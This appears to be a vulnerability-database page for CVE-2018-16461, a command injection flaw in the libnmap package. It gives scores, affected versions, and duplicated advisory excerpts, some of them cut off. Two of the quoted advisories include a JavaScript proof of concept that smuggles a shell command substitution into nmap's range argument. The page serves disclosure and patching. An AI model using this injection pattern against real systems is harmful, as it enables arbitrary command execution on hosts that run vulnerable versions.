CVE-2018-16461
published 2018-10-30CVE-2018-16461: A command injection vulnerability in libnmapp package for versions <0.4.16 allows arbitrary commands to be executed via arguments to the range options.
PriorityP262critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EPSS
3.85%
88.8th percentile
A command injection vulnerability in libnmapp package for versions <0.4.16 allows arbitrary commands to be executed via arguments to the range options.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| libnmap_project | libnmap | < 0.4.16 | 0.4.16 |
| libnmap_project | libnmap | — | — |
| libnmap_project | libnmap | >= 0 < 0.4.16 | 0.4.16 |
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
ghsa9.8CRITICAL
osv9.8CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Command Injection in standard-version
osv·2020-07-13·CVSS 9.8
[CRITICAL] Command Injection in standard-version
Command Injection in standard-version
# GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2020-111`
The [GitHub Security Lab](https://securitylab.github.com) team has identified a potential security vulnerability in [standard-version](https://github.com/conventional-changelog/standard-version).
## Summary
The `standardVersion` function has a command injection vulnerability. Clients of the `standard-version` library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
## Product
Standard Version
## Tested Version
Commit [2f04ac8](https://github.com/conventional-changelog/standard-version/tree/2f04ac8fc1c134a1981c23a093d4eece77d0bbb9/)
## Details
### Issue 1: Command injection in `standardVersion`
The following proof-of-concept i
GHSA
Command Injection in standard-version
ghsa·2020-07-13·CVSS 9.8
[CRITICAL] CWE-77 Command Injection in standard-version
Command Injection in standard-version
# GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2020-111`
The [GitHub Security Lab](https://securitylab.github.com) team has identified a potential security vulnerability in [standard-version](https://github.com/conventional-changelog/standard-version).
## Summary
The `standardVersion` function has a command injection vulnerability. Clients of the `standard-version` library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
## Product
Standard Version
## Tested Version
Commit [2f04ac8](https://github.com/conventional-changelog/standard-version/tree/2f04ac8fc1c134a1981c23a093d4eece77d0bbb9/)
## Details
### Issue 1: Command injection in `standardVersion`
The following proof-of-concept i
GHSA
Command Injection in libnmap
ghsa·2018-11-01
CVE-2018-16461 [MEDIUM] CWE-77 Command Injection in libnmap
Command Injection in libnmap
Versions of `libnmap` before 0.4.16 are vulnerable to command injection.
Proof of concept
```js
const nmap = require('libnmap');
const opts = {
range: [
'scanme.nmap.org',
"x.x.$(touch success.txt)"
]
};
nmap.scan(opts, function(err, report) {
if (err) throw new Error(err);
for (let item in report) {
console.log(JSON.stringify(report[item]));
}
});
```
## Recommendation
Update to version 0.4.16 or later
OSV
Command Injection in libnmap
osv·2018-11-01
CVE-2018-16461 [MEDIUM] Command Injection in libnmap
Command Injection in libnmap
Versions of `libnmap` before 0.4.16 are vulnerable to command injection.
Proof of concept
```js
const nmap = require('libnmap');
const opts = {
range: [
'scanme.nmap.org',
"x.x.$(touch success.txt)"
]
};
nmap.scan(opts, function(err, report) {
if (err) throw new Error(err);
for (let item in report) {
console.log(JSON.stringify(report[item]));
}
});
```
## Recommendation
Update to version 0.4.16 or later
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2018-10-30
Published